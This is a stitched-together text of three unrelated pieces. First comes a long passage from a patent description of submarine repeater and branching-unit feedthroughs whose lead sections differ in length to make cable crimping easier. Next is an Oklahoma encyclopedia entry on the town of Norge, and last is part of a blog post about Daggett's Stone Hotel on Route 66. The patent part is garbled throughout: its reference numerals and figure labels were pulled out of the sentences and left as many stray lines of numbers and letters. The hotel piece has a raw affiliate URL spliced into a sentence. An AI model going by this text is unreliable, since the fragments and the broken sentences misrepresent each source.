As illustrated in , the central lead section is located at the center of the main body section . Note that the center as mentioned herein refers to the center of the main body section in a plane (distal surface of the outer projection section illustrated in , for example) orthogonal to the through direction (arrow direction D) illustrated in . The central lead section has a larger diameter than the outer circumferential lead sections , , , for example. With this, when an insulator part of the flange section , the outer projection section , and the inner projection section of the main body section illustrated in is formed of a resin mold such as polyethylene and the like, the main body section may be supported by using the central lead section as a center axis against injection pressure of polyethylene and the like.
FIG. 5
102
103
104
111
101
102
103
104
1
111
101
101
111
102
103
104
111
101
101
111
As illustrated in , the outer circumferential lead sections , , are located on the outer circumference side of the main body section than the central lead section . In addition, the outer circumference side lead sections , , are located on a concentric circle (C) whose center is set at the center of the main body section (the central lead section in the first embodiment), for example. In addition, the central lead section may be located out of the center of the main body section , and may be located on the center side of the outer circumferential lead sections , , in the main body section . In addition, a plurality of central lead sections may be placed. For example, the plurality of central lead sections may be located on a concentric circle whose center is set at the center of the main body section .
101
102
103
104
101
102
103
104
Although it is simply an example, the central lead section is a ground wire, one outer circumferential lead section is a power wire, and other outer circumferential lead sections , are signal wires. Note that an optical fiber may be inserted into a hollow part with the central lead section and the outer circumferential lead sections , , as a tube.
FIG. 6A
2
102
103
104
111
1
101
111
2
1
101
102
103
104
As illustrated in , extension length L that the outer circumferential lead sections , , extend from the main body section is shorter than extension length L that the central lead section extends from the main body section (L<L). As such, the length of the central lead section and the length of the outer circumferential lead sections , , are different from each other.
2
1
104
101
104
111
101
104
1
2
1
101
104
1
2
101
104
101
104
FIG. 6A
FIG. 6B
FIG. 5
For example, a difference in length between L and L only has to be equal to or larger than thickness of a tool to be used. Note that in and , the outer circumferential lead section is not depicted. In addition, even if the base portions of the lead sections to are located at different positions because the main body section has an irregular end face (face illustrated in , for example) on the base side of the lead sections to , the extension lengths L, L may be considered as length from a plane orthogonal to the through direction (arrow D) of the lead sections to . Thus, the length of the extension length L, L of the lead sections to may be determined by positions of the tips of the lead sections to .
FIG. 6A
FIG. 6A
2
2
2
The same relationship between the extension lengths as described above may be applied to both the inner side (left side in ) and the outer side (right side in ) of the pressure-tight casing . In addition, although the extension lengths may be made different in only one of the inner side and the outer side of the pressure-tight casing as described above, it is desirable to make the extension lengths different in both the inner side and the outer side of the pressure-tight casing , from the standpoint of facilitating cable connection as described below.
2
102
103
104
2
101
104
While the extension length L of the outer circumferential lead sections , , is mutually identical, the extension length L may be different from each other. As such, the extension lengths of the plurality of lead sections to may be three or more lengths, in place of two lengths.
101
102
103
104
101
102
103
104
14
14
1
14
2
14
3
14
101
102
103
104
101
102
103
104
9
9
1
9
2
9
3
9
104
14
9
104
a
a
a
a
a
a
a
a
b
b
b
b
a
a
a
a
a
a
FIG. 6A
FIG. 6B
Ends (small-diameter part , , , ) of the central lead section and the outer circumferential lead sections , , are connected to measuring device-side electric wire cables (-, -, -) of the measuring device . In addition, other ends (small-diameter parts , , , ) of the central lead section and the outer circumferential lead sections , , are connected to internal unit-side electric wire cables (-, -, -) of the internal unit . Note that the outer circumferential lead section , as well as the measuring device-side electric wire cables and the internal unit-side electric wire cables connected to the outer circumferential lead section are not illustrated in and .
FIG. 6A
FIG. 6B
101
102
103
104
9
14
14
9
9
a
a
a
a
a
Here, with reference to and , connection of the central lead section and the outer circumferential lead sections , , with the internal unit-side electric wire cables and the measuring device-side electric wire cables is described. Here, since connection with the measuring device-side electric wire cables is similar to connection with the internal unit-side electric wire cables , a description is given with the connection with the internal unit-side electric wire cables as an example.
FIG. 6A
101
9
1
15
1
a
First, as illustrated in , the central lead section (one example of a first lead section) is connected to the internal unit-side electric wire cable (one example of a first cable) -. The connection is performed by a crimping connection section - which uses a crimping tool. However, the connection may be performed by other connection vehicle such as high frequency brazing, resistance brazing, and the like.
102
103
104
9
2
9
3
15
2
15
3
104
9
14
104
102
103
a
a
a
a
FIG. 6A
FIG. 6B
Then, the outer circumferential lead sections (one example of a second lead section) , , are sequentially connected to the internal unit-side electric wire cables (one example of a second cable) -, - by crimping connection sections -, -, for example. Note that as described above, the outer circumferential lead section , as well as the internal unit-side electric wire cables and the measuring device-side electric wire cable , which are connection destinations of the outer circumferential lead section , although not illustrated in and , are similarly connected to the remaining two outer circumferential lead sections , .
101
102
103
104
9
14
15
16
16
a
a
FIG. 6B
After the central lead section and the outer-side lead sections , , are connected to the internal unit-side electric wire cables and the measuring device-side electric wire cables , surrounding areas of the crimping connection sections are covered by a mold connection section , as illustrated in . The mold connection section is formed of an insulating material such as polyethylene.
12
13
10
11
2
100
10
11
12
13
1001
5
6
7
8
1
FIG. 3
FIG. 1
FIG. 2
Then, the tail cables , are connected to the optical fiber feedthroughs , illustrated in . In addition, the pressure-tight casing is sealed with the electric wire feedthrough or the optical fiber feedthroughs , placed. In addition, connection of the tail cables , with the submarine cable or arrangement of the bellows , and the cable couplings , are performed. Thus, the submarine repeater illustrated in and is manufactured.
100
11
11
101
104
100
100
11
1
In addition, the electric wire feedthrough and the optical fiber feedthrough may be formed as a single feedthrough in which the lead section of the optical fiber feedthrough and lead sections to of the electric wire feedthrough may be provided. This may simplify the structure. On the other hand, if the electric wire feedthrough and the optical fiber feedthrough are separately provided, work to replace a feedthrough or a connection device in the submarine repeater , and other work may be made easier.
100
2
2
2
100
2
2
100
2
100
14
b
a
a
a
In addition, the electric wire feedthroughs may be placed on both the one end face and the other end face of the pressure-tight casing . Alternatively, the electric wire feedthrough may be placed only on the other end face of the pressure-tight casing . Also if the electric wire feedthrough is placed on the other end face , the electric wire feedthrough is connected to a device such as the measuring device , and the like.
FIG. 7
17
is a sectional view illustrating a measuring device and the like in a variation of the first embodiment.
FIG. 7
FIG. 3
14
17
A configuration illustrated in is a variation in which the measuring device in the configuration illustrated in is changed to other measuring device .
17
17
17
17
17
17
a
b
a
b
a.
The measuring device has a measuring device main body and an oil-filled electric cable . The measuring device main body is a manometer containing oil, for example. The oil-filled electric cable has an electric wire whose surrounding area is filled with insulating oil which is different from the oil in the measuring device main body
17
17
17
17
100
2
17
4
17
a
b
a
a
b.
FIG. 7
A position to place the measuring device main body may be adjusted, depending on how to route the oil-filled electric cable of the measuring device . In the example of , the measuring device main body is located in the periphery of the electric wire feedthrough and close to the pressure-tight casing . Note that the measuring device main body may be arranged in the sea outside the coupler by way of a cable such as the oil-filled electric cable
FIG. 8
FIG. 9
1
and are views illustrating an arrangement example of the submarine repeater according to the first embodiment.
FIG. 8
1001
1002
1003
1
1001
1005
1004
As illustrated in , the submarine cable is laid in the sea and located across a first landing station and a second landing station . A plurality of the submarine repeaters are arranged on the submarine cable . Note that a ship is floating on the sea surface .
FIG. 9
FIG. 3
FIG. 7
1003
1006
1002
1002
1003
14
17
1
14
17
18
18
As illustrated in , instead of the second landing station , an earth electrode configured to cause electric currents to flow into or from the sea may be located on the opposite side to the first landing station . The arrangement example illustrated in this figure is not used for communications between the landing stations , and thus is an arrangement example for other purpose, such as intended use to arrange the measuring device illustrated in or the measuring device illustrated in , for example. Note that one example of a device to be placed in the submarine repeater other than the measuring devices , is an underwater mateable connector . The underwater mateable connector is used for power feeding to or communications with a device arranged in the sea. One example of other devices is an echo sounder, an imaging device, an underwater sound modem, and the like.
100
101
104
9
2
14
2
101
104
2
1
a
a
In the first embodiment described above, the electric wire feedthrough has the plurality of lead sections to connecting a circuit (internal unit-side electric wire cables ) housed in the pressure-tight casing with the cables (measuring device-side electric wire cables ) outside the pressure-tight casing . In addition, at least two lead sections of the plurality of lead sections to have length which is different to each other (L<L).
15
9
14
101
104
a
a
Thus, a space to use a tool which forms connection sections such as the crimping connection sections or a brazing connection sections is secured only by making the connection positions of the internal unit-side electric wire cables or the measuring device-side electric wire cables with the plurality of lead sections to different from each other by an amount equal to or more than the thickness of the tool to be used, for example.
9
14
101
104
100
a
a
Hence, according to the first embodiment, the work to connect the internal unit-side electric wire cables and the measuring device-side electric wire cables with the plurality of lead sections to of the electric wire feedthrough is facilitated.
101
104
101
102
103
104
101
101
2
1
9
14
101
102
103
104
a
a
In the first embodiment, the plurality of lead sections to include the central lead section and the plurality of outer circumferential lead sections , , which are located on the outer circumference side of the central lead section and have shorter extension length than the central lead section (L<L). Thus, the connection work is facilitated by performing connection of the internal unit-side electric wire cables and the measuring device-side electric wire cables on the central lead section before the connection on the outer circumferential lead sections , , .
102
103
104
1
111
102
103
104
9
14
a
a
In addition, in the first embodiment, the plurality of outer circumferential lead sections , , are located on the concentric circle (C) whose center is set at the center of the main body section . Thus, the connection work of the outer circumferential lead sections , , with the internal unit-side electric wire cable and the measuring device-side electric wire cables is facilitated.
101
111
111
111
111
111
101
a
b
c
In addition, in the first embodiment, the central lead section is located at the center of the main body section . Thus, when insulated parts such as the flange section , the outer projection section , and the inner projection section of the main body section are formed by molding, the central lead section may be supported as a central axis.
14
17
14
101
104
14
14
17
a
a
In addition, in the first embodiment, the measuring devices , , which are one example of measurement hardware, are connected to one end of the measuring device-side electric wire cables to measure the conditions in water, for example. Thus, work to connect to the lead sections to the plurality of measuring device-side electric wire cables such as the power wire, the ground wire, a control wire and the like to be used in response to placement of the measuring devices , is facilitated.
100
101
104
9
14
101
104
a
a
In addition, in the first embodiment, one example of a feedthrough is the electric wire feedthrough having the plurality of lead sections to connected to the electric wire cables (internal unit-side electric wire cables and the measuring device-side electric wire cables ). Thus, the connection work to connect the electric wire cables such as the power wire, the ground wire, the control wire and the like to the plurality of lead sections to is facilitated.
9
1
14
1
101
9
2
9
3
14
2
14
3
102
103
104
9
14
101
102
103
104
a
a
a
a
a
a
a
a
In addition, in the first embodiment, one of the internal unit-side electric wire cable (one example of the first cable) - or the measuring device-side electric wire cable (one example of the first cable) - is connected to the central lead section (one example of the first lead section) . Then, the internal unit-side electric wire cables (one example of the second cable) -, - or the measuring device-side electric wire cables (one example of the second cable) -, - are connected to the outer circumferential lead sections (one example of the second lead section) , (). Thus, performing the connection with the internal unit-side electric wire cable and the measuring device-side electric wire cable earlier on the central lead section whose extension length is longer than the outer circumferential lead sections , , facilitates the connection work.
FIG. 10
FIG. 10
FIG. 5
201
207
is a view illustrating 7-core lead sections to in a second embodiment. Note that is a drawing corresponding to in the first embodiment.
FIG. 11A
FIG. 11B
FIG. 10
and are XIA/XIB-XIA/XIB cross sectional views (views illustrating how an electric cable is connected) of .
201
207
In the second embodiment, although the number of the lead sections to differs from the number (4 leads) of the first embodiment, other configuration is similar. Thus, any overlapping description is omitted as appropriate.
200
201
207
211
212
FIG. 11A
FIG. 11B
FIG. 10
An electric wire feedthrough illustrated in and has a plurality of the lead sections to (see ), a main body section , and a cap member .
111
211
211
211
211
211
a
b
c
d.
Similar to the main body section of the first embodiment, the main body section includes a flange section , an outer projection section , an inner projection section , and a disk member
212
212
112
a
The cap member also has a flange section , similar to the cap member of the first embodiment.
FIG. 10
FIG. 3
201
207
201
202
203
204
205
206
207
201
207
211
2
202
203
204
As illustrated in , the plurality of lead sections to may be sorted to one central lead section , three (one example of multiple leads) intermediate lead sections , , , and three (one example of multiple leads) outer circumferential lead sections , , . The plurality of lead sections to run through the main body section , extending to the inner side and the outer side of the pressure-tight casing illustrated in . Note that the intermediate lead sections , , may be one.
FIG. 10
FIG. 11B
FIG. 11A
FIG. 11A
201
207
201
207
2
201
207
201
202
206
2
201
211
211
202
207
211
a
a
b
b
b
d
d
d.
As illustrated in to , for the plurality of lead sections to , small-diameter parts to are formed on ends on the outer side (right side in ) of the pressure-tight casing . In addition, also for the plurality of lead sections to , small-diameter parts , , (only partially illustrated) are formed on ends on the inner side (left side in ) of the pressure-tight casing . Note that while the central lead section is fixed to the disk member in contact with the disk member , an insulator is intermediate between other lead sections to and the disk member
FIG. 10
FIG. 10
FIG. 11A
FIG. 11B
201
211
211
211
211
2
b
As illustrated in , the central lead section is located at the center of the main body section . Similar to the first embodiment, the center of the main body section is the center of the main body section in a plane (distal surface of the outer projection section illustrated in , for example) orthogonal to the through direction (arrow D) illustrated in and .
205
206
207
201
211
205
206
207
12
211
201
205
206
207
12
The outer circumferential lead sections , , are located on the outer circumference side of the central lead section in of the main body section . In addition, the outer circumferential lead sections , , are located on a concentric circle (C) whose center is set at the center of the main body section (the central lead section also in the second embodiment). In addition, the outer circumferential lead sections , , are arranged at regular intervals on the concentric circle (C).
202
203
204
201
205
206
207
202
203
204
11
211
201
202
203
204
11
202
203
204
11
11
205
206
207
The intermediate lead sections , , are located on the outer circumference side of the central lead section and on the center side of the outer circumferential lead sections , , . In addition, the intermediate lead sections , , are located a concentric circle (C) whose center is set at the center of the main body section (central lead section ), for example. In addition, the intermediate lead sections , , are arranged at regular intervals on the concentric circle (C). Note that the intermediate lead sections , , are located in the middle, in a circumferential direction of the concentric circle (C), between a plurality of positions of the concentric circle (C) located closest to the outer circumferential lead sections , , .
201
207
Although it is simply an example, each lead section to is respectively more than one ground wire, power wire, and signal wire.
FIG. 11A
202
203
204
201
12
11
205
206
207
12
13
13
12
12
11
As illustrated in , the intermediate lead sections , , have shorter extension length than the central lead section (L<L) and longer extension length than the outer circumferential lead sections , , (L>L). A difference in length between L and L and a difference in length between L and L only have to be equal to or larger than the thickness of a tool to be used, for example.
2
12
202
203
204
12
13
205
206
207
13
201
207
11
12
13
FIG. 3
Note that a relationship of the extension lengths as described above is true in both the inner side and the outer side of the pressure-tight casing illustrated in . In addition, while the extension lengths L of the intermediate lead sections , , are mutually identical, the extension lengths L may be different from each other. While the extension lengths L of the outer circumferential lead sections , , are also mutually identical, the extension lengths L may be different from each other. As such, while the extension lengths of the plurality of lead sections to are three lengths of L, L, and L, the extension lengths may be four or more lengths.
201
207
201
207
14
14
11
14
12
14
16
14
201
207
201
202
206
9
9
11
9
12
9
16
9
a
a
a
a
a
a
b
b
b
a
a
a
a
FIG. 3
FIG. 3
Ends of the plurality of lead sections to (small-diameter parts to ) are connected to the measuring device-side electric wire cables (-, -, - and the like) of the measuring device illustrated in . In addition, other ends of the plurality of lead sections to (small-diameter parts , , and the like) are connected to the internal unit-side electric wire cables (-, -, - and the like) of the internal unit illustrated in .
FIG. 11A
FIG. 11B
201
207
9
14
14
91
9
a
a
a
a
Here, with reference to and , connection of the plurality of lead sections to with the internal unit-side electric wire cables or the measuring device-side electric wire cables is described. Since the connection with the measuring device-side electric wire cables is similar to the connection with the internal unit-side electric wire cables , a description is given with the internal unit-side electric wire cables as an example.
201
9
11
15
15
11
a
First, the central lead section is connected to the internal unit-side electric wire cable -. The connection is performed by a calling connection unit (-) which uses a crimping tool. However, the connection may be performed by other connection vehicle such as high frequency brazing, resistance brazing, and the like.
202
203
204
9
9
12
15
15
12
203
204
9
14
203
204
a
a
a
a
FIG. 11A
FIG. 11B
Then, the intermediate lead sections , , are sequentially connected to the internal unit-side electric cable wire (- and the like) by the crimping connection section (- and the like), for example. Note that the intermediate lead sections , as well as the internal unit-side electric wire cable and the measuring device-side electric wire cable which are connection destinations of the intermediate lead sections , are not illustrated in and .
205
206
207
9
9
16
15
15
16
205
207
9
14
205
207
a
a
a
a
FIG. 11A
FIG. 11B
Then, the outer circumferential lead sections , , are sequentially connected to the internal unit-side electric wire cable (- and the like) by the crimping connection section (- and the like). Note that the outer circumferential lead sections , as well as the internal unit-side electric wire cable and the measuring device-side electric wire cable which are connection destinations of the outer circumferential lead sections , are not illustrated in and .
201
207
9
14
15
16
16
1
a
a
FIG. 11B
After the plurality of lead sections to are connected to the internal unit-side electric wire cable and the measuring device-side electric wire cable , surrounding areas of the crimping connection sections are covered by a mold connection section , as illustrated in . The mold connection section is formed of an insulating material such as polyethylene. Other processes of the manufacturing method of the submarine repeater may be similarly performed to the first embodiment.
9
14
201
207
200
a
a
In the second embodiment described above, similar effects may be achieved for matters similar to the first embodiment. More particularly, according to the second embodiment, the effect of facilitating the work to connect the internal unit-side electric wire cable and the measuring device-side electric wire cable to the plurality of lead sections to of the electric wire feedthrough , and the like may be achieved.
202
203
204
201
205
206
207
202
203
204
11
202
203
204
201
12
11
205
206
207
12
13
9
14
201
202
203
204
205
206
207
a
a
In addition, in the second embodiment, the plurality of intermediate lead sections , , are located on the outer circumference side of the central lead section and on the center side of the outer circumferential lead sections , , . In addition, the plurality of intermediate lead sections , , are located on the concentric circle C. Furthermore, the plurality of intermediate lead sections , , are shorter in length than the central lead section (L<L), and longer in length than the outer circumferential lead sections , , (L>L). Thus, performing the connection of the internal unit-side electric wire cable and the measuring device-side electric wire in the order of the central lead section , the intermediate lead sections , , , and the outer circumferential lead sections , , facilitates the connection work.
FIG. 12
FIG. 12
FIG. 5
FIG. 10
FIG. 12
FIG. 11A
FIG. 11B
FIG. 11A
FIG. 11B
301
309
is a view illustrating 9-core lead sections to in a third embodiment. Note that is a drawing corresponding to (the first embodiment) and (the second embodiment). In addition, the XIA/XIB-XIA/XIB cross sectional view of is a view of an identical structure to and of the second embodiment, a description is given with reference to and , as appropriate.
302
305
306
309
While the third embodiment differs from the second embodiment in that the number of intermediate lead sections to and outer circumferential lead sections to is increased by one each from the number in the second embodiment (three leads each), the third embodiment is same as the second embodiment in other configurations. Thus, an overlapping description is omitted, as appropriate.
FIG. 12
FIG. 11A
FIG. 11B
FIG. 3
301
309
301
302
305
306
309
301
309
211
311
2
b
As illustrated in , a plurality of the lead sections to may be sorted to one central lead section , four (one example of multiple leads) intermediate lead sections to , and four (one example of multiple leads) outer circumferential lead sections to . The plurality of the lead sections to run through a main body section (similar to the main body section illustrated in and ) having an outer projection section , extending to the inner side and the outer side of the pressure-tight casing illustrated in .
301
309
301
309
2
301
309
2
a
a
FIG. 12
For the plurality of the lead sections to , small-diameter sections to illustrated in are formed on ends on the outer side of the pressure-tight casing . In addition, also for the plurality of lead sections to , small-diameter parts are formed on ends on the inner side of the pressure-tight casing .
FIG. 12
301
302
305
21
301
306
309
22
301
302
305
21
21
306
309
As illustrated in , the central lead section is located at the center of the main body section. The intermediate lead sections to are located on a concentric circle (C) whose center is set at the center of the main body section (central lead section ), for example. The outer circumferential lead sections to are also located on a concentric circle (C) whose center is set at the center of the main body section (central lead section ), for example. Note that the intermediate lead sections to are located in the middle, in a circumferential direction of the concentric circle (C), between a plurality of positions on the concentric circle (C) located closest to the outer circumferential lead sections to .
301
309
Although it is simply an example, also in the third embodiment, each lead section to is respectively one or more ground wire, power wire, and signal wire.
302
305
301
22
21
306
309
22
23
23
22
22
21
FIG. 12
The intermediate lead sections to illustrated in have shorter extension length than the central lead section (L<L) and longer extension length than the outer circumferential lead sections to (L>L). A difference in length between L and L and a difference in length between L and L have only to exceed thickness of a tool to be used, for example.
2
22
302
305
22
23
306
309
23
301
309
21
22
23
FIG. 3
Note that a relationship of the extension lengths as described above is true in both the inner side and the outer side of the pressure-tight casing illustrated in . Also in the third embodiment, while the extension lengths L of the intermediate sections to are mutually identical, the extension lengths L may be different from each other. While the extension lengths L of the outer circumferential lead sections to are mutually identical, the extension lengths L may be different from each other. As such, while the extension lengths of the plurality of lead sections to are three lengths of L, L, and L, the extension lengths may be four or more lengths.
1
301
309
FIG. 11A
FIG. 11B
Since a manufacturing method of the submarine repeater such as connection of the plurality of lead sections to with cables is similar to the manufacturing method described in the second embodiment with reference to and , a description is omitted.
301
309
300
In the third embodiment described above, similar effects may be achieved for matters similar to the first embodiment and the second embodiment. More particularly, according to the third embodiment, the effect of facilitating the work to connect cables to the plurality of lead sections to of the electric wire feedthroughs , and the like may be achieved.
FIG. 13
401
is a front view illustrating a submarine branching unit according to a fourth embodiment.
FIG. 14
401
is a partial cross sectional front view illustrating the submarine branching unit according to the fourth embodiment.
FIG. 13
401
402
403
404
405
406
406
1
406
2
407
408
408
1
408
2
As illustrated in , the submarine branching unit includes a pressure-tight casing (one example of a casing) , couplers , , bellows , (-, -), and cable couplings , (-, -).
FIG. 14
401
410
411
412
412
1
412
2
413
413
1
413
2
In addition, as illustrated in , the submarine branching unit further includes optical fiber feedthroughs , and tail cables (-, -), (-, -).
401
410
411
Note that in the fourth embodiment, one example of a “repeater” is the submarine branching unit and one example of a “feedthrough” is the feedthroughs , .
402
410
402
411
402
402
a
b
The pressure-tight casing is internally kept water-tight and airtight by the optical fiber feedthrough placed on an end face on the side of one end and a feedthrough for optical wire placed on an end face on the side of the other end. The pressure-tight casing is shaped like a hollow cylinder, for example.
403
404
402
402
402
403
402
402
404
402
402
402
406
1
406
2
a
b
a
b
The couplers , are provided on the sides of both ends (end faces , ) of the pressure-tight casing . The coupler on the side of the end face at the one end of the pressure-tight casing is shaped like a cylinder, for example. In addition, the coupler on the side of the end face at the other end of the pressure-tight casing shaped like a cylinder branching from the pressure-tight casing to two branches across the two bellows -, -.
405
406
1
406
2
403
404
407
408
1
408
2
407
408
1
408
2
403
404
405
406
1
406
2
407
408
1
408
2
403
404
The bellows , -, - are positioned between the couplers , and the cable couplings , -, -. The cable couplings , -, - are coupled to the couplers , by universal joints so that angles made therebetween may vary. The bellows , -, - curve with the cable couplings , -, - inclining with respect to the couplers , .
412
1
412
2
413
1
413
2
1001
1001
1
1001
2
407
408
407
408
1
408
2
402
The tail cables -, -, -, - are connected with submarine cables , -, - within the cable couplings , . The cable couplings , -, - have such a tapered shape that a diameter becomes smaller as the cable couplings are away from the pressure-tight casing .
412
1
412
2
413
1
413
2
101
1001
1
1001
2
Note that the tail cables -, -, -, - and the submarine cables , -, - have an optical fiber located within a tubular power feeding conductor coated by an insulating material such as polyethylene and the like.
FIG. 15
FIG. 15
FIG. 5
FIG. 10
FIG. 12
410
410
411
410
410
a
b
is a view illustrating 2-core lead sections , in the fourth embodiment. Note that is a drawing corresponding to (the first embodiment), (the second embodiment), and (the third embodiment). In addition, structure of the optical fiber feedthrough and structure of the optical fiber feedthrough may be made similar, one of which, the optical fiber feedthrough , is thus described here.
FIG. 15
FIG. 14
410
410
410
410
402
a
b
e
As illustrated in , two lead sections , of the optical fiber feedthrough run through the main body section , extending to the inner side and the outer side of the pressure-tight casing illustrated in .
410
410
410
410
402
410
410
402
410
410
410
1
410
1
a
b
c
d
a
b
a
b
a
b
FIG. 15
For the plurality of lead sections , , small-diameter parts , illustrated in are formed on ends on the outer side of the pressure-tight casing . In addition, also for the plurality of lead sections , , small-diameter parts are formed on ends on the inner side of the pressure-tight casing . Note that the lead sections , are shaped like a tube in which hollow parts -, - are formed.
31
410
410
32
410
31
32
402
31
32
a
e
b
FIG. 15
FIG. 14
Extension length L that one lead section illustrated in extends from the main body section differs from extension length L of the other lead section (L≠L). In addition, a relationship of the extension lengths as described above is true in both the inner side and the outer side of the pressure-tight casing illustrated in . A difference in length between L and L only has to be equal to or larger than the thickness of a tool to be used, for example.
100
200
300
410
411
Note that the feedthroughs , , in the first to third embodiments described above may be further placed in addition to the feedthroughs , for optical fiber.
100
200
300
410
411
412
1
412
2
413
1
413
2
In addition, it may also be acceptable that the electric wire feedthroughs , , are placed and that the feedthroughs for optical wire , may be separated into two feedthroughs to which only one of the tail cables -, -, -, - is connected.
410
410
412
1
412
2
412
1
412
2
410
1
410
1
410
410
410
410
410
410
410
a
b
a
b
a
b
a
b
a
b
For connection of the plurality of lead sections , with the tail cables -, -, the optical fibers of the tail cables -, - are first inserted through the hollow parts -, - of the lead sections , . With the optical fibers inserted through the lead sections , , the power feeding conductors around the optical fibers are connected to the lead sections , of the optical fiber feedthrough via a brazing connection section or a crimping connection section, for example. Here, if crimping connection is performed, it is desirable to arrange a stainless core material between the optical fiber and the power feeding conductor so as to keep the optical fiber away from being collapsed due to the crimping connection.
410
410
410
412
1
410
412
2
401
406
1
406
2
408
1
408
2
1001
1
1001
2
a
b
a
b
As for the order of connecting the lead sections , , the lead section (, for example) having longer extension length, which is one example of the first lead section, may be firstly connected with the tail cable (-, for example), which is one example of the first cable. Then, the lead section (, for example) having shorter extension length, which is one example of the second lead section, may be connected with the tail cable (-, for example), which is one example of the second cable. In addition, the other processes of a manufacturing method of the submarine branching unit are similar to those in the first embodiment, although the number of the bellows -, - or the cable couplings -, - placed for the branched submarine cables -, - is increased by one.
412
1
412
2
413
1
413
2
410
410
410
411
a
b
The fourth embodiment described above may achieve effects similar to those in the first to third embodiments. More particularly, use of the fourth embodiment makes it possible to achieve effects such as an effect of facilitating the work to connect the tail cables -, -, -, - to the plurality of lead sections , of the feedthroughs for optical wire , .
410
411
410
410
412
1
412
2
413
1
413
2
410
410
412
1
412
2
413
1
413
2
a
b
a
b
In addition, in the fourth embodiment, one example of a feedthrough is the optical fiber feedthroughs , having the lead sections , connected to the optical fiber cables (tail cables -, -, -, -). Thus, the connection work to connect the lead sections , to the tail cables -, -, -, - is facilitated.
All examples and conditional language recited herein are intended for pedagogical purposes to aid the reader in understanding the invention and the concepts contributed by the inventor to furthering the art, and are to be construed as being without limitation to such specifically recited examples and conditions, nor does the organization of such examples in the specification relate to a showing of the superiority and inferiority of the invention. Although the embodiments of the present invention have been described in detail, it should be understood that the various changes, substitutions, and alterations could be made hereto without departing from the spirit and scope of the invention.
BRIEF DESCRIPTION OF DRAWINGS
FIG. 1
is front view illustrating a submarine repeater according to a first embodiment;
FIG. 2
is a partial sectional front view illustrating the submarine repeater according to the first embodiment;
FIG. 3
FIG. 2
is an enlarged view of a part III of ;
FIG. 4
is a partial sectional perspective view illustrating an electric wire feedthrough according to the first embodiment;
FIG. 5
FIG. 4
is a view of one end side of the electric wire feedthrough when viewed from a direction V of ;
FIG. 6A
FIG. 5
1
is a VIA/VIB-VIA/VIB sectional view (view illustrating how the electric wire cable is connected) of ;
FIG. 6B
FIG. 5
2
is a VIA/VIB-VIA/VIB sectional view (view illustrating how the electric wire cable is connected) of ;
FIG. 7
is a front view illustrating a measuring device and the like in a variation of the first embodiment;
FIG. 8
1
is a view () illustrating an arrangement example of the submarine repeater according to the first embodiment;
FIG. 9
2
is a view () illustrating an arrangement example of the submarine repeater according to the first embodiment;
FIG. 10
is a view illustrating a lead section (7-core) in a second embodiment;
FIG. 11A
FIG. 10
1
is a XIA/XIB-XIA/XIB sectional view (view illustrating how an electric wire cable is connected) of ;
FIG. 11B
FIG. 10
2
is a XIA/XIB-XIA/XIB sectional view (view illustrating how the electric wire cable is connected) of ;
FIG. 12
is a view illustrating a lead section (9-core) in a third embodiment;
FIG. 13
is a front view illustrating a submarine branching unit according to a fourth embodiment;
FIG. 14
is a partial sectional front view of the submarine branching unit according to the fourth embodiment; and
FIG. 15
is a view illustrating a lead section (2-core) in the fourth embodiment. | |
NORGE.
Norge is a community located four miles southwest of Chickasha on State Highway 92 in Grady County. Situated along the St. Louis and San Francisco Railway on the old Allie townsite, Norge was settled about 1907 as Norden. The Norden post office was established on January 27, 1908, and its designation was changed to Norge on March 21, 1908. Pres. Theodore Roosevelt commissioned Norwegian immigrant Anfin Ersland, a Civil War veteran, as Norge's first postmaster.
The name Norge, the Norwegian-language word for Norway, honored the large group of Norwegians who settled the farming community. They traveled from Iowa on two railroad passenger cars in 1907 in search of their own land. Norwegian families from Illinois joined them later. In 1918 the community had 60 people, and by 1930, 300. Norge incorporated in 1971, and the 1980 and 1990 census counted 87 and 97 inhabitants, respectively. The 2000 census listed 82, and in 2010 Norge's population had grown to 145.
Early Norge included a railroad depot, a Western Union office, two grain elevators, two cotton gins, a lumberyard, two service stations, a blacksmith shop, two churches, and a grade school. The Great Depression and the Dust Bowl took their toll on Norge. The lack of good water hampered the town's growth. By 1943 two businesses, one of which housed the post office, and the depot remained.
The Norge post office closed in 1954. At the beginning of the twenty-first century the community had a town form of government and little business activity except oil and natural gas production. The establishment of a rural water system has provided a good residential setting for families southwest of Chickasha, including many descendants of Norge's founding Norwegian settlers.
See also: SETTLEMENT PATTERNS
Bibliography
Chickasha (Oklahoma) Daily Express, 24 September 1990, 31 August and 1 September 1993.
Chickasha (Oklahoma) Star, 20 September 1990.
"Norge," Vertical File, Research Division, Oklahoma Historical Society, Oklahoma City.
Citation
The following (as per The Chicago Manual of Style, 17th edition) is the preferred citation for articles:
Pat Cunningham, “Norge,” The Encyclopedia of Oklahoma History and Culture, https://www.okhistory.org/publications/enc/entry?entry=NO005.
© Oklahoma Historical Society. | https://www.okhistory.org/publications/enc/entry?entry=NO005 |
|A former roadside oasis in Daggett, California|
There were a few more services available sixty years ago but even in 1946 when Jack Rittenhouse rolled through town taking notes for his now famous A Guide Book to Highway 66, it was just a wide, dusty spot in the road. Rittenhouse gave the town and its history but the briefest mention before moving on to describe the services available in Barstow.
He and countless travelers since missed a real diamond in the rough, a true treasure hidden in plain sight the Stone Hotel. Since at least 1884 this venerable old building with walls of stone and adobe two feet thick has cast a shadow across the road that would later be signed with two sixes.
|Stone Hotel, Daggett, California|
The earliest historic record for the property, according to a fascinating thesis written by Teresa J. Jerry and lent to me for research on the Route 66 encyclopedia project, is a recording in the San Bernardino County Deed Book for the Railroad Hotel dated 1884. Unconfirmed reports place its founding to the year previous, which is one year after the Southern Pacific Railroad laid tracks to the town site of Calico Junction, Daggett, established in 1882.
The old hotel has played host to a wide array of historic figures including John Muir (his daughter lived in Daggett), Walter Scott, better known as http://rcm.amazon.com/e/cm?t=1968adventurer&o=1&p=8&l=bpl&asins=0826311482&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=0000FF&bc1=000000&bg1=FFFFFF&f=ifr“Death Valley Scotty”, who used room number seven as his offices in the early twentieth century, Lt. Governor of California John Daggett, the town’s namesake, and Bill Curry. Legend has it that Wyatt Earp was also a regular but this has never been confirmed even though the Earp family did have land holdings in the area.
The old hotel survived two fires, the bane of most mining camps, but was not unscathed. The single story structure that casts its shadow across Route 66 today, and the market to the west, is the Phoenix that rose from the devastating fire of 1908.
Before this date the hotel, fronting the railroad station, was a “luxurious” two story structure with glass and iron dome over the lobby. There were even balconies.
